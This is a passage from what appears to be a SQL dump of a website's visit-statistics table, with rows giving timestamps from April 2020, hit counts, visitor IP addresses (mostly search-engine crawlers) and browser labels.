5','chrome'),(494596,1585970152,1,0,1,0,'207.46.13.5',''),(494597,1585970284,1,1,0,0,'66.249.64.23','chrome'),(494598,1585970547,1,1,0,0,'91.209.11.236','other'),(494599,1585970967,2,2,0,0,'66.249.64.25','chrome'),(494600,1585971030,1,1,0,0,'207.46.13.154','other'),(494601,1585971309,2,2,0,0,'66.249.64.23','chrome'),(494602,1585971405,1,1,0,0,'207.46.13.5','other'),(494603,1585971806,1,1,0,0,'91.209.11.236','other'),(494604,1585971993,1,1,0,0,'66.249.64.25','chrome'),(494605,1585972970,1,1,0,0,'91.209.11.236','other'),(494606,1585973412,1,1,0,0,'66.249.64.25','chrome'),(494607,1585973677,2,2,0,0,'178.154.200.222','other'),(494608,1585973693,1,1,0,0,'213.180.203.16','other'),(494609,1585973757,1,1,0,0,'91.196.178.165','chrome'),(494610,1585974179,1,1,0,0,'91.209.11.236','other'),(494611,1585975017,1,1,0,0,'62.205.134.182','other'),(494612,1585975267,1,1,0,0,'91.209.11.236','other'),(494613,1585975541,1,1,0,0,'91.196.178.70','chrome'),(494614,1585975660,1,1,0,0,'66.249.70.33','chrome'),(494615,1585975785,1,1,0,0,'66.249.64.25','chrome'),(494616,1585976250,1,1,0,0,'91.209.11.236','other'),(494617,1585976607,1,1,0,0,'178.154.200.222','other'),(494618,1585976815,3,3,0,0,'207.46.13.154','other'),(494619,1585977074,1,1,0,0,'66.249.70.33','chrome'),(494620,1585977734,1,1,0,0,'66.249.64.23','chrome'),(494621,1585977792,2,2,0,0,'66.249.64.24','chrome'),(494622,1585977855,2,2,0,0,'66.249.64.25','chrome'),(494623,1585978268,1,1,0,0,'91.209.11.236','other'),(494624,1585978654,1,1,0,0,'8.29.198.26','other'),(494625,1585979169,1,1,0,0,'91.209.11.236','other'),(494626,1585979275,1,1,0,0,'8.29.198.27','other'),(494627,1585979464,1,0,1,0,'207.46.13.5',''),(494628,1585980124,2,2,0,0,'91.209.11.236','other'),(494629,1585980196,1,1,0,0,'66.249.64.24','chrome'),(494630,1585981471,8,8,0,0,'77.120.98.235','other'),(494631,1585981514,1,1,0,0,'178.154.200.222','other'),(494632,1585981836,2,2,0,0,'91.209.11.236','other'),(494633,1585982093,1,1,0,0,'207.46.13.154','other'),(494634,1585982503,1,1,0,0,'207.46.13.5','other'),(494635,1585983353,3,3,0,0,'66.249.64.25','chrome'),(494636,1585983403,2,2,0,0,'66.249.64.24','chrome'),(494637,1585983550,2,2,0,0,'91.209.11.236','other'),(494638,1585983688,1,1,0,0,'138.197.66.66','other'),(494639,1585984348,3,3,0,0,'66.249.64.23','chrome'),(494640,1585984522,1,1,0,0,'167.71.190.107','other'),(494641,1585984587,2,2,0,0,'66.249.64.24','chrome'),(494642,1585985141,1,1,0,0,'207.46.13.154','other'),(494643,1585985180,2,2,0,0,'91.209.11.236','other'),(494644,1585986229,1,1,0,0,'66.249.64.24','chrome'),(494645,1585986761,2,2,0,0,'91.209.11.236','other'),(494646,1585987303,1,1,0,0,'207.46.13.5','other'),(494647,1585987405,2,2,0,0,'66.249.70.36','chrome'),(494648,1585988122,1,0,1,0,'66.249.64.23',''),(494649,1585988123,1,1,0,0,'66.249.64.25','chrome'),(494650,1585988384,1,1,0,0,'213.180.203.16','other'),(494651,1585988401,6,6,0,0,'66.249.64.24','chrome'),(494652,1585988471,2,2,0,0,'91.209.11.236','other'),(494653,1585988724,1,1,0,0,'138.246.253.5','chrome'),(494654,1585988823,1,1,0,0,'178.154.200.220','chrome'),(494655,1585989115,2,2,0,0,'66.249.64.23','chrome'),(494656,1585989396,1,1,0,0,'66.249.64.25','chrome'),(494657,1585989483,1,1,0,0,'8.29.198.27','other'),(494658,1585990101,1,1,0,0,'8.29.198.25','other'),(494659,1585990229,1,1,0,0,'91.209.11.236','other'),(494660,1585990362,1,1,0,0,'66.249.64.25','chrome'),(494661,1585990695,2,2,0,0,'66.249.70.33','chrome'),(494662,1585990854,3,3,0,0,'66.249.64.24','chrome'),(494663,1585991035,2,2,0,0,'66.249.64.23','chrome'),(494664,1585991158,2,2,0,0,'91.209.11.236','other'),(494665,1585991591,2,2,0,0,'207.46.13.154','other'),(494666,1585991681,1,1,0,0,'66.249.64.25','chrome'),(494667,1585992815,1,1,0,0,'66.249.64.23','chrome'),(494668,1585993137,1,1,0,0,'66.249.70.36','chrome'),(494669,1585995418,3,3,0,0,'173.252.111.2','other'),(494670,1585995422,1,1,0,0,'173.252.111.20','other'),(494671,1585995426,1,1,0,0,'173.252.111.19','other'),(494672,1585995748,8,8,0,0,'77.120.98.235','other'),(494673,1585996707,2,2,0,0,'66.249.64.23','chrome'),(494674,1585996787,1,1,0,0,'66.249.64.25','chrome'),(494675,1585996989,1,1,0,0,'66.249.70.38','chrome'),(494676,1585997703,1,1,0,0,'207.46.13.5','other'),(494677,1585997843,1,1,0,0,'66.249.64.25','chrome'),(494678,1585998320,1,1,0,0,'207.46.13.154','other'),(494679,1585998919,3,3,0,0,'66.249.64.24','chrome'),(494680,1585999446,1,1,0,0,'109.74.154.72','chrome'),(494681,1585999533,1,1,0,0,'207.46.13.5','other'),(494682,1586000148,1,1,0,0,'209.17.96.234','other'),(494683,1586000317,2,2,0,0,'8.29.198.25','other'),(494684,1586000790,1,1,0,0,'207.46.13.154','other'),(494685,1586000795,1,1,0,0,'207.46.13.5','other'),(494686,1586000810,1,1,0,0,'66.249.64.23','chrome'),(494687,1586000973,1,1,0,0,'66.249.64.24','chrome'),(494688,1586003268,1,1,0,0,'207.46.13.5','other'),(494689,1586003307,1,1,0,0,'131.220.6.152','chrome'),(494690,1586003335,1,1,0,0,'207.46.13.154','other'),(494691,1586003867,1,1,0,0,'66.249.64.23','chrome'),(494692,1586004138,2,2,0,0,'66.249.70.36','chrome'),(494693,1586004294,1,1,0,0,'178.154.200.222','other'),(494694,1586004787,2,2,0,0,'91.209.11.236','other'),(494695,1586005052,1,0,1,0,'157.55.39.159',''),(494696,1586005556,1,1,0,0,'66.249.64.24','chrome'),(494697,1586005656,1,1,0,0,'66.249.64.23','chrome'),(494698,1586006575,1,1,0,0,'91.209.11.236','other'),(494699,1586006924,3,3,0,0,'66.249.64.25','chrome'),(494700,1586007559,2,2,0,0,'66.249.64.23','chrome'),(494701,1586008001,2,2,0,0,'213.180.203.16','other'),(494702,1586008040,1,1,0,0,'207.46.13.5','other'),(494703,1586008171,2,2,0,0,'178.154.200.222','other'),(494704,1586008341,2,2,0,0,'66.249.64.25','chrome'),(494705,1586008904,2,2,0,0,'213.180.203.16','other'),(494706,1586008915,2,2,0,0,'66.249.64.24','chrome'),(494707,1586009411,1,1,0,0,'178.154.200.222','other'),(494708,1586009601,1,1,0,0,'66.249.64.25','chrome'),(494709,1586009603,1,1,0,0,'66.249.64.23','chrome'),(494710,1586010063,8,8,0,0,'77.120.98.235','other'),(494711,1586010082,1,1,0,0,'66.249.64.24','chrome'),(494712,1586010514,1,1,0,0,'66.249.70.36','chrome'),(494713,1586011150,1,1,0,0,'8.29.198.25','other'),(494714,1586011341,1,1,0,0,'31.13.127.24','other'),(494715,1586011343,1,1,0,0,'31.13.127.21','other'),(494716,1586011410,1,1,0,0,'2.47.39.212','other'),(494717,1586011751,1,1,0,0,'8.29.198.27','other'),(494718,1586011899,1,1,0,0,'31.13.127.6','other'),(494719,1586011934,1,0,1,0,'207.46.13.154',''),(494720,1586013290,1,1,0,0,'66.249.64.25','chrome'),(494721,1586013761,2,2,0,0,'66.249.64.24','chrome'),(494722,1586013822,1,1,0,0,'66.249.70.38','chrome'),(494723,1586014082,1,1,0,0,'157.55.39.159','other'),(494724,1586016149,3,3,0,0,'66.249.64.24','chrome'),(494725,1586016255,1,1,0,0,'66.249.64.23','chrome'),(494726,1586016375,1,1,0,0,'178.154.200.222','other'),(494727,1586016444,1,1,0,0,'207.46.13.5','other'),(494728,1586017227,1,1,0,0,'82.145.210.110','other'),(494729,1586017452,1,1,0,0,'66.249.64.23','chrome'),(494730,1586017583,1,1,0,0,'66.249.70.38','chrome'),(494731,1586017683,5,5,0,0,'66.249.64.24','chrome'),(494732,1586017744,3,3,0,0,'66.249.64.25','chrome'),(494733,1586017811,1,1,0,0,'91.196.178.27','chrome'),(494734,1586017881,1,1,0,0,'178.154.200.92','other'),(494735,1586017946,1,1,0,0,'178.154.200.222','other'),(494736,1586018102,1,1,0,0,'178.154.200.19','other'),(494737,1586018234,2,2,0,0,'207.46.13.5','other'),(494738,1586018842,1,1,0,0,'91.196.178.27','chrome'),(494739,1586019086,2,2,0,0,'66.249.64.24','chrome'),(494740,1586019536,2,2,0,0,'66.249.64.25','chrome'),(494741,1586019574,2,2,0,0,'66.249.64.23','chrome'),(494742,1586020520,1,1,0,0,'66.249.64.24','chrome'),(494743,1586020912,3,3,0,0,'66.249.64.25','chrome'),(494744,1586021254,1,1,0,0,'207.46.13.5','other'),(494745,1586021547,3,3,0,0,'66.249.64.23','chrome'),(494746,1586021976,1,1,0,0,'8.29.198.27','other'),(494747,1586022172,1,1,0,0,'91.196.178.23','chrome'),(494748,1586022574,1,1,0,0,'8.29.198.26','other'),(494749,1586022591,1,1,0,0,'66.249.64.23','chrome'),(494750,1586023017,4,4,0,0,'157.55.39.159','other'),(494751,1586023788,1,1,0,0,'66.249.64.23','chrome'),(494752,1586023870,1,1,0,0,'207.46.13.154','other'),(494753,1586024054,157,157,0,0,'188.163.50.39','chrome'),(494754,1586024495,8,8,0,0,'77.120.98.235','other'),(494755,1586024793,1,1,0,0,'66.249.64.25','chrome'),(494756,1586024813,1,1,0,0,'157.55.39.159','other'),(494757,1586024853,2,2,0,0,'66.249.64.24','chrome'),(494758,1586025044,1,1,0,0,'66.249.64.23','chrome'),(494759,1586025135,1,1,0,0,'66.249.70.38','chrome'),(494760,1586025153,1,1,0,0,'213.180.203.16','other'),(494761,1586025441,2,2,0,0,'207.46.13.154','other'),(494762,1586025909,2,2,0,0,'66.249.64.24','chrome'),(494763,1586026010,109,109,0,0,'188.163.50.39','chrome'),(494764,1586026457,2,2,0,0,'66.249.64.23','chrome'),(494765,1586026905,1,1,0,0,'66.249.64.24','chrome'),(494766,1586027262,1,1,0,0,'213.180.203.16','other'),(494767,1586027454,1,1,0,0,'91.196.178.27','firefox'),(494768,1586027853,3,3,0,0,'157.55.39.159','other'),(494769,1586028232,1,1,0,0,'66.249.64.24','chrome'),(494770,1586028313,1,1,0,0,'66.249.64.25','chrome'),(494771,1586028715,1,1,0,0,'66.249.70.36','chrome'),(494772,1586028742,1,0,1,0,'207.46.13.154',''),(494773,1586029541,1,1,0,0,'66.249.64.25','chrome'),(494774,1586029677,2,1,1,0,'66.249.64.23',''),(494775,1586029971,1,1,0,0,'37.9.58.194','chrome'),(494776,1586030831,1,1,0,0,'207.46.13.154','other'),(494777,1586030900,1,1,0,0,'157.55.39.159','other'),(494778,1586031088,1,1,0,0,'66.249.64.23','chrome'),(494779,1586031772,1,1,0,0,'66.249.70.36','chrome'),(494780,1586032804,1,1,0,0,'8.29.198.27','other'),(494781,1586033129,1,1,0,0,'66.249.70.36','chrome'),(494782,1586033240,1,1,0,0,'66.249.64.25','chrome'),(494783,1586033404,1,1,0,0,'8.29.198.25','other'),(494784,1586033618,1,1,0,0,'213.180.203.16','other'),(494785,1586033718,1,1,0,0,'178.154.200.222','other'),(494786,1586034549,1,1,0,0,'213.180.203.16','other'),(494787,1586034553,3,3,0,0,'66.249.64.24','chrome'),(494788,1586034774,1,1,0,0,'157.55.39.159','other'),(494789,1586035714,1,1,0,0,'66.249.70.38','chrome'),(494790,1586035814,2,2,0,0,'66.249.64.25','chrome'),(494791,1586036057,1,1,0,0,'66.249.70.36','chrome'),(494792,1586036449,2,2,0,0,'157.55.39.159','other'),(494793,1586036512,1,1,0,0,'207.46.13.5','other'),(494794,1586036590,2,2,0,0,'178.154.200.222','other'),(494795,1586037031,1,1,0,0,'66.249.64.24','chrome'),(494796,1586038081,2,2,0,0,'207.46.13.154','other'),(494797,1586038782,1,1,0,0,'178.154.200.222','other'),(494798,1586038787,8,8,0,0,'77.120.98.235','other'),(494799,1586039212,2,2,0,0,'66.249.64.25','chrome'),(494800,1586039585,3,3,0,0,'162.242.251.21','other'),(494801,1586039590,1,1,0,0,'207.46.13.5','other'),(494802,1586039814,1,1,0,0,'178.154.200.92','other'),(494803,1586039824,1,1,0,0,'178.154.200.222','other'),(494804,1586039937,2,2,0,0,'66.249.64.23','chrome'),(494805,1586040253,1,1,0,0,'66.249.64.25','chrome'),(494806,1586040690,1,1,0,0,'213.180.203.16','other'),(494807,1586041385,1,1,0,0,'66.249.64.23','chrome'),(494808,1586041723,1,1,0,0,'178.154.200.222','other'),(494809,1586041982,1,1,0,0,'66.249.64.24','chrome'),(494810,1586042063,1,1,0,0,'157.55.39.159','other'),(494811,1586042544,1,1,0,0,'207.46.13.5','other'),(494812,1586042971,1,1,0,0,'178.154.200.222','other'),(494813,1586043034,2,2,0,0,'66.249.64.23','chrome'),(494814,1586043577,1,1,0,0,'66.249.70.38','chrome'),(494815,1586043631,2,2,0,0,'8.29.198.26','other'),(494816,1586043817,1,1,0,0,'18.188.89.204','chrome'),(494817,1586043939,1,1,0,0,'66.249.64.25','chrome'),(494818,1586044202,1,1,0,0,'207.46.13.5','other'),(494819,1586044406,2,2,0,0,'66.249.70.33','chrome'),(494820,1586044505,1,1,0,0,'62.205.134.182','other'),(494821,1586044532,1,1,0,0,'66.249.64.24','chrome'),(494822,1586045491,2,2,0,0,'66.249.64.25','chrome'),(494823,1586045683,1,1,0,0,'213.180.203.16','other'),(494824,1586046073,1,1,0,0,'178.154.200.236','other'),(494825,1586046078,1,1,0,0,'138.246.253.5','chrome'),(494826,1586046143,1,1,0,0,'66.249.64.23','chrome'),(494827,1586046282,1,0,1,0,'207.46.13.154',''),(494828,1586046795,1,1,0,0,'66.249.64.24','chrome'),(494829,1586046997,2,2,0,0,'157.55.39.159','other'),(494830,1586047097,1,1,0,0,'66.249.64.23','chrome'),(494831,1586048193,1,1,0,0,'66.249.64.24','chrome'),(494832,1586048203,2,2,0,0,'66.249.64.23','chrome'),(494833,1586048662,2,2,0,0,'157.55.39.159','other'),(494834,1586048704,1,1,0,0,'207.46.13.154','other'),(494835,1586048878,1,1,0,0,'207.46.13.5','other'),(494836,1586049220,1,1,0,0,'66.249.64.25','chrome'),(494837,1586051362,1,1,0,0,'66.249.70.38','chrome'),(494838,1586051382,1,1,0,0,'207.46.13.154','other'),(494839,1586051464,1,1,0,0,'66.249.64.24','chrome'),(494840,1586051690,2,2,0,0,'207.46.13.5','other'),(494841,1586052130,3,3,0,0,'162.242.251.21','other'),(494842,1586052248,2,2,0,0,'66.249.70.33','chrome'),(494843,1586052371,1,1,0,0,'66.249.64.24','chrome'),(494844,1586052417,2,2,0,0,'66.249.64.23','chrome'),(494845,1586052429,2,2,0,0,'66.249.64.25','chrome'),(494846,1586052717,1,1,0,0,'213.180.203.16','other'),(494847,1586052894,2,2,0,0,'207.46.13.5','other'),(494848,1586053991,1,1,0,0,'157.55.39.159','other'),(494849,1586054246,8,8,0,0,'77.120.98.235','other'),(494850,1586054268,1,1,0,0,'66.249.70.33','chrome'),(494851,1586054450,3,3,0,0,'66.249.64.23','chrome'),(494852,1586054452,2,2,0,0,'8.29.198.25','other'),(494853,1586054601,2,2,0,0,'66.249.64.25','chrome'),(494854,1586054856,1,1,0,0,'91.209.11.236','other'),(494855,1586055138,2,2,0,0,'66.249.64.24','chrome'),(494856,1586055439,1,1,0,0,'66.249.70.33','chrome'),(494857,1586055526,4,4,0,0,'66.249.64.23','chrome'),(494858,1586055908,2,2,0,0,'66.249.64.25','chrome'),(494859,1586057030,1,1,0,0,'207.46.13.154','other'),(494860,1586057155,1,1,0,0,'66.249.70.33','chrome'),(494861,1586057259,3,3,0,0,'35.226.128.48','chrome'),(494862,1586057323,3,3,0,0,'34.67.154.139','chrome'),(494863,1586057335,2,2,0,0,'35.226.146.88','chrome'),(494865,1586057345,2,2,0,0,'35.222.83.208','chrome'),(494867,1586057354,2,2,0,0,'104.198.64.209','chrome'),(494869,1586057364,1,1,0,0,'35.222.243.93','chrome'),(494870,1586057365,2,2,0,0,'35.222.243.93','chrome'),(494871,1586057900,1,1,0,0,'66.249.64.24','chrome'),(494872,1586058042,1,1,0,0,'157.55.39.159','other'),(494873,1586058624,1,0,1,0,'66.249.64.25',''),(494874,1586058894,1,1,0,0,'46.211.9.61','chrome'),(494875,1586059247,1,1,0,0,'66.249.64.25','chrome'),(494876,1586059257,1,1,0,0,'66.249.64.23','chrome'),(494877,1586059639,2,2,0,0,'66.249.64.24','chrome'),(494878,1586059709,2,2,0,0,'66.249.70.33','chrome'),(494879,1586059719,1,1,0,0,'66.249.70.36','chrome'),(494880,1586059962,1,1,0,0,'91.209.11.236','other'),(494881,1586060665,1,1,0,0,'66.249.70.38','chrome'),(494882,1586060905,1,1,0,0,'207.46.13.154','other'),(494883,1586060931,1,1,0,0,'62.210.83.78','chrome'),(494884,1586061062,2,2,0,0,'66.249.64.24','chrome'),(494885,1586061097,1,1,0,0,'91.209.11.236','other'),(494886,1586061136,4,4,0,0,'66.249.64.23','chrome'),(494887,1586061491,1,1,0,0,'62.205.134.182','other'),(494888,1586061649,1,1,0,0,'66.249.64.25','chrome'),(494889,1586061884,1,1,0,0,'207.46.13.5','other'),(494890,1586062202,2,2,0,0,'91.209.11.236','other'),(494891,1586062368,2,2,0,0,'66.249.64.24','chrome'),(494892,1586062831,1,1,0,0,'66.249.64.23','chrome'),(494893,1586062965,1,1,0,0,'213.180.203.16','chrome'),(494894,1586063936,2,2,0,0,'91.209.11.236','other'),(494895,1586064180,1,1,0,0,'207.46.13.154','other'),(494896,1586064188,1,1,0,0,'66.249.64.25','chrome'),(494897,1586064198,1,1,0,0,'66.249.64.23','chrome'),(494898,1586064560,3,3,0,0,'66.249.64.24','chrome'),(494899,1586065189,1,1,0,0,'207.46.13.154','other'),(494900,1586065277,1,1,0,0,'8.29.198.26','other'),(494901,1586065428,1,0,1,0,'66.249.70.36',''),(494902,1586065541,2,2,0,0,'66.249.64.23','chrome'),(494903,1586065619,1,1,0,0,'91.209.11.236','other'),(494904,1586065636,2,2,0,0,'66.249.64.24','chrome'),(494905,1586065898,1,1,0,0,'8.29.198.27','other'),(494906,1586066219,2,2,0,0,'66.249.64.25','chrome'),(494907,1586066607,2,2,0,0,'91.209.11.236','other'),(494908,1586067004,1,1,0,0,'66.249.64.24','chrome'),(494909,1586068289,1,1,0,0,'91.209.11.236','other'),(494910,1586068374,8,8,0,0,'77.120.98.235','other'),(494911,1586068521,2,2,0,0,'188.143.169.29','other'),(494912,1586069084,1,1,0,0,'31.13.127.19','other'),(494913,1586069190,2,2,0,0,'91.209.11.236','other'),(494914,1586069451,1,1,0,0,'89.163.242.241','opera'),(494915,1586071038,1,1,0,0,'91.209.11.236','other'),(494916,1586071269,2,2,0,0,'207.46.13.5','other'),(494917,1586071303,1,1,0,0,'207.46.13.154','other'),(494918,1586071968,1,1,0,0,'91.209.11.236','other'),(494919,1586072770,1,1,0,0,'207.46.13.154','other'),(494920,1586072930,1,1,0,0,'91.209.11.236','other'),(494921,1586074007,1,1,0,0,'91.209.11.236','other'),(494922,1586074707,1,1,0,0,'66.249.64.24','chrome'),(494923,1586074961,1,1,0,0,'91.209.11.236','other'),(494924,1586075952,1,1,0,0,'91.209.11.236','other'),(494925,1586076105,1,1,0,0,'8.29.198.25','other'),(494926,1586076720,1,1,0,0,'8.29.198.26','other'),(494927,1586077080,1,1,0,0,'91.209.11.236','other'),(494928,1586077105,1,0,1,0,'207.46.13.5',''),(494929,1586077266,3,3,0,0,'66.249.64.25','chrome'),(494930,1586078063,1,1,0,0,'91.209.11.236','other'),(494931,1586079630,2,2,0,0,'66.249.64.25','chrome'),(494932,1586079738,1,1,0,0,'66.249.64.24','chrome'),(494933,1586080228,1,1,0,0,'91.209.11.236','other'),(494934,1586081022,8,8,0,0,'77.120.98.235','other'),(494935,1586081317,1,1,0,0,'66.249.70.33','chrome'),(494936,1586081326,1,1,0,0,'66.249.70.36','chrome'),(494937,1586081659,1,1,0,0,'66.249.64.25','chrome'),(494938,1586081719,1,1,0,0,'66.249.64.23','chrome'),(494939,1586082355,2,2,0,0,'66.249.64.24','chrome'),(494940,1586082440,1,1,0,0,'91.209.11.236','other'),(494941,1586082915,1,1,0,0,'66.249.64.23','chrome'),(494942,1586083557,1,1,0,0,'91.209.11.236','other'),(494943,1586084343,1,1,0,0,'66.249.64.23','chrome'),(494944,1586084676,1,1,0,0,'91.209.11.236','other'),(494945,1586085211,1,1,0,0,'109.74.154.72','chrome'),(494946,1586085811,2,2,0,0,'66.249.64.24','chrome'),(494947,1586085835,1,1,0,0,'91.209.11.236','other'),(494948,1586086930,1,1,0,0,'8.29.198.27','other'),(494949,1586086998,1,1,0,0,'91.209.11.236','other'),(494950,1586087137,1,1,0,0,'157.55.39.235','other'),(494951,1586087142,2,2,0,0,'207.46.13.5','other'),(494952,1586087544,1,1,0,0,'8.29.198.25','other'),(494953,1586087875,1,1,0,0,'66.249.70.36','chrome'),(494954,1586088025,2,2,0,0,'66.249.64.23','chrome'),(494955,1586088035,1,1,0,0,'66.249.64.24','chrome'),(494956,1586089252,3,3,0,0,'66.249.64.23','chrome'),(494957,1586089343,2,2,0,0,'66.249.64.24','chrome'),(494958,1586089368,1,1,0,0,'91.209.11.236','other'),(494959,1586090016,1,1,0,0,'66.249.70.33','chrome'),(494960,1586090159,1,1,0,0,'131.220.6.152','chrome'),(494961,1586090192,1,1,0,0,'66.249.64.23','chrome'),(494962,1586090464,1,1,0,0,'157.55.39.235','other'),(494963,1586090578,1,1,0,0,'91.209.11.236','other'),(494964,1586091145,2,2,0,0,'66.249.64.23','chrome'),(494965,1586091464,3,3,0,0,'66.249.64.24','chrome'),(494966,1586091659,1,1,0,0,'78.111.189.122','chrome'),(494967,1586091817,1,1,0,0,'91.209.11.236','other'),(494968,1586092992,1,1,0,0,'157.55.39.235','other'),(494969,1586093122,1,1,0,0,'91.209.11.236','other'),(494970,1586093157,8,8,0,0,'77.120.98.235','other'),(494971,1586093639,2,2,0,0,'207.46.13.5','other'),(494972,1586094050,1,1,0,0,'66.249.70.36','chrome'),(494973,1586094378,1,1,0,0,'91.209.11.236','other'),(494974,1586094393,2,2,0,0,'66.249.64.23','chrome'),(494975,1586094945,1,1,0,0,'193.106.30.99','firefox'),(494976,1586095015,1,1,0,0,'157.55.39.235','other'),(494977,1586095547,1,1,0,0,'66.249.64.23','chrome'),(494978,1586095793,1,1,0,0,'91.209.11.236','other'),(494979,1586095987,1,1,0,0,'157.55.39.235','other'),(494980,1586096211,1,1,0,0,'66.249.64.24','chrome'),(494981,1586096367,1,1,0,0,'46.63.45.156','chrome'),(494982,1586097018,1,1,0,0,'91.209.11.236','other'),(494983,1586097216,1,1,0,0,'66.249.64.23','chrome'),(494984,1586097458,2,2,0,0,'66.249.64.24','chrome'),(494985,1586097753,2,2,0,0,'8.29.198.26','other'),(494986,1586098336,1,1,0,0,'91.209.11.236','other'),(494987,1586098433,1,1,0,0,'66.249.64.23','chrome'),(494988,1586099358,1,1,0,0,'66.249.64.23','chrome'),(494989,1586099740,1,1,0,0,'91.209.11.236','other'),(494990,1586100807,1,1,0,0,'66.249.64.23','chrome'),(494991,1586102485,1,1,0,0,'91.209.11.236','other'),(494992,1586103230,1,1,0,0,'66.249.64.23','chrome'),(494993,1586103480,1,1,0,0,'157.55.39.235','other'),(494994,1586104035,1,1,0,0,'91.209.11.236','other'),(494995,1586104548,1,1,0,0,'66.249.64.24','chrome'),(494996,1586105461,1,1,0,0,'91.209.11.236','other'),(494997,1586105764,1,1,0,0,'207.46.13.5','other'),(494998,1586105809,1,1,0,0,'178.154.200.222','other'),(494999,1586105810,1,1,0,0,'213.180.203.16','other'),(495000,1586106308,2,2,0,0,'66.249.64.24','chrome'),(495001,1586106854,1,1,0,0,'91.209.11.236','other'),(495002,1586106874,8,8,0,0,'77.120.98.235','other'),(495003,1586107083,1,1,0,0,'207.46.13.119','other'),(495004,1586107657,1,1,0,0,'66.249.64.25','chrome'),(495005,1586107796,1,1,0,0,'66.249.70.33','chrome'),(495006,1586108209,2,2,0,0,'66.249.64.23','chrome'),(495007,1586108368,1,1,0,0,'91.209.11.236','other'),(495008,1586108585,2,2,0,0,'8.29.198.25','other'),(495009,1586109454,1,1,0,0,'157.55.39.235','other'),(495010,1586109458,5,5,0,0,'207.46.13.119','other'),(495011,1586109464,2,2,0,0,'207.46.13.5','other'),(495012,1586109633,1,1,0,0,'91.209.11.236','other'),(495013,1586110619,1,1,0,0,'207.46.13.119','other'),(495014,1586110837,1,1,0,0,'91.209.11.236','other'),(495015,1586111105,1,1,0,0,'66.249.64.24','chrome'),(495016,1586112109,1,1,0,0,'66.249.64.25','chrome'),(495017,1586112129,1,1,0,0,'66.249.64.24','chrome'),(495018,1586112646,3,3,0,0,'207.46.13.208','other'),(495019,1586113275,1,1,0,0,'66.249.64.25','chrome'),(495020,1586113688,1,1,0,0,'66.249.64.24','chrome'),(495021,1586113698,1,1,0,0,'66.249.70.38','chrome'),(495022,1586114252,1,1,0,0,'207.46.13.208','other'),(495023,1586114312,1,0,1,0,'207.46.13.119',''),(495024,1586115710,1,1,0,0,'207.46.13.119','other'),(495025,1586116041,1,1,0,0,'66.249.70.38','chrome'),(495026,1586116228,1,1,0,0,'66.249.64.23','chrome'),(495027,1586116906,1,1,0,0,'66.249.64.24','chrome'),(495028,1586117891,1,1,0,0,'66.249.64.23','chrome'),(495029,1586117928,2,2,0,0,'207.46.13.119','other'),(495030,1586118235,2,2,0,0,'192.99.7.128','other'),(495031,1586118237,1,0,1,0,'157.55.39.235',''),(495032,1586118684,1,1,0,0,'157.55.39.235','other'),(495033,1586119161,1,0,1,0,'207.46.13.119',''),(495034,1586119193,2,2,0,0,'207.46.13.208','other'),(495035,1586119418,1,1,0,0,'8.29.198.25','other'),(495036,1586119572,1,1,0,0,'178.154.200.222','other'),(495037,1586120031,1,1,0,0,'8.29.198.27','other'),(495038,1586120045,1,1,0,0,'95.134.97.225','chrome'),(495039,1586120210,2,2,0,0,'193.106.30.99','firefox'),(495040,1586120940,4,4,0,0,'178.154.200.222','other'),(495041,1586121036,8,8,0,0,'77.120.98.235','other'),(495042,1586121881,1,1,0,0,'213.180.203.16','other'),(495043,1586122780,3,3,0,0,'178.154.200.222','other'),(495044,1586122986,1,1,0,0,'207.46.13.5','other'),(495045,1586123230,1,1,0,0,'66.249.64.25','chrome'),(495046,1586123754,1,1,0,0,'157.55.39.235','other'),(495047,1586124981,2,2,0,0,'178.154.200.222','other'),(495048,1586125785,1,1,0,0,'207.46.13.119','other'),(495049,1586126196,3,3,0,0,'178.154.200.222','other'),(495050,1586127116,1,0,1,0,'207.46.13.5',''),(495051,1586127191,2,2,0,0,'213.180.203.16','other'),(495052,1586127235,1,1,0,0,'62.109.22.217','chrome'),(495053,1586128167,4,4,0,0,'178.154.200.222','other'),(495054,1586128693,1,1,0,0,'66.249.64.23','chrome'),(495055,1586128874,1,1,0,0,'188.163.75.43','msie'),(495056,1586128931,3,3,0,0,'213.180.203.16','other'),(495057,1586130161,3,3,0,0,'178.154.200.222','other'),(495058,1586130231,1,1,0,0,'66.249.64.25','chrome'),(495059,1586130247,1,1,0,0,'8.29.198.26','other'),(495060,1586130869,1,1,0,0,'8.29.198.27','other'),(495061,1586130905,1,1,0,0,'62.205.134.182','other'),(495062,1586131179,3,3,0,0,'178.154.200.222','other'),(495063,1586131948,2,2,0,0,'213.180.203.16','other'),(495064,1586132806,1,1,0,0,'66.249.64.23','chrome'),(495065,1586132822,3,3,0,0,'178.154.200.222','other'),(495066,1586133062,1,1,0,0,'207.46.13.208','other'),(495067,1586133157,1,1,0,0,'213.180.203.16','other'),(495068,1586135144,4,4,0,0,'178.154.200.222','other'),(495069,1586135197,1,1,0,0,'207.46.13.208','other'),(495070,1586135689,1,1,0,0,'178.154.200.220','other'),(495071,1586136354,1,1,0,0,'207.46.13.119','other'),(495072,1586136455,2,2,0,0,'178.154.200.222','other'),(495073,1586136496,8,8,0,0,'77.120.98.235','other'),(495074,1586137314,1,0,1,0,'66.249.64.23',''),(495075,1586137530,1,1,0,0,'178.154.200.222','other'),(495076,1586137565,2,2,0,0,'91.209.11.236','other'),(495077,1586137708,1,1,0,0,'178.154.200.97','other'),(495078,1586137987,1,1,0,0,'213.180.203.16','other'),(495079,1586139110,2,2,0,0,'91.209.11.236','other'),(495080,1586139526,2,2,0,0,'178.154.200.222','other'),(495081,1586140250,2,2,0,0,'207.46.13.208','other'),(495082,1586140639,1,1,0,0,'66.249.64.23','chrome'),(495083,1586140867,2,2,0,0,'91.209.11.236','other'),(495084,1586141079,1,1,0,0,'8.29.198.27','other'),(495085,1586141699,1,1,0,0,'8.29.198.25','other'),(495086,1586142068,1,1,0,0,'178.154.200.222','other'),(495087,1586142178,4,4,0,0,'66.249.64.23','chrome'),(495088,1586142188,1,1,0,0,'66.249.64.25','chrome'),(495089,1586142419,1,1,0,0,'66.249.64.24','chrome'),(495090,1586142557,2,2,0,0,'91.209.11.236','other'),(495091,1586142827,1,1,0,0,'178.154.200.220','other'),(495092,1586143107,2,2,0,0,'207.46.13.119','other'),(495093,1586143194,1,1,0,0,'213.180.203.16','other'),(495094,1586143348,3,3,0,0,'178.154.200.222','other'),(495095,1586143867,1,1,0,0,'66.249.64.23','chrome'),(495096,1586144086,1,0,1,0,'207.46.13.5',''),(495097,1586144229,1,1,0,0,'91.209.11.236','other'),(495098,1586144269,1,1,0,0,'207.46.13.119','other'),(495099,1586144604,1,1,0,0,'213.180.203.16','other'),(495100,1586145315,1,1,0,0,'66.249.64.23','chrome'),(4